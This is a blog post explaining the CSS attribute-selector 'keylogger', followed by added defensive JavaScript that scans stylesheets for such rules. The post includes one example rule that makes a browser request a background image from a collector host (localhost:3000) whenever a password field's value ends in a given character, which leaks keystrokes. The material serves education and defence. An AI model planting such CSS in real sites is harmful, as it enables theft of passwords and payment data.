By: Joeri Jungschlager
March 4, 2018

CSS Hacking: The Surprise of February

To some it may have popped up earlier than 2018; for me it was quite new. I walked into the office after a week of teaching children how to code. Given the age group, the choice of HTML & CSS was more than acceptable. But to my surprise, I may have got them way closer to writing their first sort of keylogger than I thought. A few of the kids who were accelerating over the past 4 days took their first steps in JavaScript and Angular. But even without JavaScript knowledge, it is possible to log keys. The method is very creative. I am going to show the method, which I found on GitHub. Now there are a few things to keep in mind ahead.
  1. It's not system-wide

  2. It is also really specific about what data you can obtain with this method.

  3. It is still dangerous: data like passwords and credit card numbers can be stolen.

This attack is really simple. Utilizing CSS attribute selectors, one can request resources from an external server under the premise of loading a background-image.

For example, the following CSS will select all inputs with a type that equals password and a value that ends with a. It will then try to load an image from http://localhost:3000/a.

The CSS code

input[type="password"][value$="a"] {
  background-image: url("http://localhost:3000/a");
}
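From the defender's side, the rule shape described above (an attribute selector on value paired with an off-origin url()) can be searched for in any stylesheet a page loads. The following is an added example, not code from the original post or the GitHub project it mentions; findValueExfilRules, pageOrigin, allowedOrigins and the example.test hosts are hypothetical names chosen for illustration.

```javascript
// Added example (not from the original post): audit a stylesheet for rules that
// pair a value-attribute selector with an off-origin url().
// findValueExfilRules, pageOrigin and allowedOrigins are hypothetical names.
function findValueExfilRules(cssText, pageOrigin, allowedOrigins = []) {
  const findings = [];
  // Strip comments so they cannot hide a rule or fake one.
  const css = cssText.replace(/\/\*[\s\S]*?\*\//g, "");
  // Innermost "selector { declarations }" pairs; rules nested in @media still match.
  const ruleRe = /([^{}]+)\{([^{}]*)\}/g;
  // [value=..], [value$=..], [value^=..], [value*=..], [value~=..], [value|=..]
  const valueSelRe = /\[\s*value\s*[$^*~|]?=/i;
  const urlRe = /url\(\s*(['"]?)([^'")]+)\1\s*\)/gi;
  for (const [, rawSelector, body] of css.matchAll(ruleRe)) {
    const selector = rawSelector.trim();
    if (!valueSelRe.test(selector)) continue;
    for (const [, , rawUrl] of body.matchAll(urlRe)) {
      let target;
      try {
        // Resolve relative and protocol-relative URLs the way the browser would.
        target = new URL(rawUrl.trim(), pageOrigin);
      } catch {
        continue; // unparsable URL: nothing would be fetched
      }
      if (target.protocol === "data:") continue; // inline data, no network request
      if (target.origin === pageOrigin || allowedOrigins.includes(target.origin)) continue;
      findings.push({ selector, url: target.href, origin: target.origin });
    }
  }
  return findings;
}

// Constructed sample: a benign rule, the rule from the post, and an allow-listed CDN rule.
const sampleCss = `
  body { background-image: url("http://localhost:3000/bg.png"); }
  /* input[value$="z"] { background: url(http://localhost:3000/z); } */
  input[type="password"][value$="a"] { background-image: url("http://localhost:3000/a"); }
  @media screen { input[value^="x"] { background: url(//cdn.example.test/x.png); } }
  input[value*="y"] { background: url(/img/y.png); }
`;
const report = findValueExfilRules(sampleCss, "https://app.example.test",
  ["https://cdn.example.test"]);
console.log(report);
```

A Content-Security-Policy that limits img-src and style-src to trusted origins stops the background-image request itself, so this audit complements that control rather than replacing it.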
